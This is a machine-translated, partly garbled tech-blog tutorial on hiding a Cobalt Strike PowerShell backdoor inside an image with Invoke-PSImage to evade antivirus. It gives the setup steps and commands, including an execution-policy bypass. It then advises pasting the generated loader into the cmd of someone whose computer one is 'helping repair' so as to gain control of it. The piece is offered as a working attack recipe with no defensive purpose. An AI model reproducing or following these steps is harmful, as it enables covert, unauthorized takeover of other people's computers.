Shulou(Shulou.com)05/31 Report--

This article will explain in detail how Cobalt Strike uses powershell to avoid killing. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

Experimental preparation

A kali

A testing machine (equipped with velvet)

A 1920-1200 picture (can only be large, not small), the following code to be inserted into the picture, the pixel is small enough digits.

Cobalt Strike tool

Invoke-psimage script

Start experiment 1: kali connection cs tool, I use kali and window10 two computers to operate, because window10's cs graphical interface is easier to operate, a Kali can also be completed.

Download the Cobalt Strike tool, copy it to kali, and open the terminal in this file location

Enter the folder and execute the teamserver file. The IP address is the ip of your kali (type a code, afraid the boss will connect me), 123456 randomly set the password, and later you need to connect to the windows to generate a string of hash.

Two: also open cobalstrike3.14 on windows, double-click cobalstrike.bat to run (note that java environment needs to be installed)

After running, the password is the password set by kali, ip, port, user name by default, and connect to the graphical interface.

Three: create a monitor, click on the headset, add a monitor, set the port to a non-duplicate one with a random name, and other defaults

4: generate Trojan horse, select attack module, generate backdoor, click Payload Generator, output and generate a powershell, and save the generated ps1 file to the desktop.

Five: decompress the downloaded Cobalt Strike tool locally, open the Invoke-PSImage-master inside, put the downloaded 1920-1200 pictures and ps1 files into it, open cmd in this folder, and enter the following three commands in turn

Powershell-ExecutionPolicy Bypass

Import-Module.\ Invoke-PSImage.ps1

Invoke-PSImage-Script.\ payload.ps1-Image. \ test1.jpg-Out test2.png-Web

A string of generated code is saved.

A 22.jpg is generated in the folder and will be uploaded to the kali listening machine.

Six: open CobaltStrike, the file select the generated picture, mine is 22.jpg, upload will generate an address, copy and save 7. Replace the address just generated by the address in the previously copied connection 8: the most important moment, if you help others repair the computer, just input a string of code just generated into the other party's cmd, open powershell, copy execution, return you can see the CobaltStrike target host online, successfully get the permissions of the other computer.

This is the end of this article on "how Cobalt Strike uses powershell to avoid killing". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it out for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.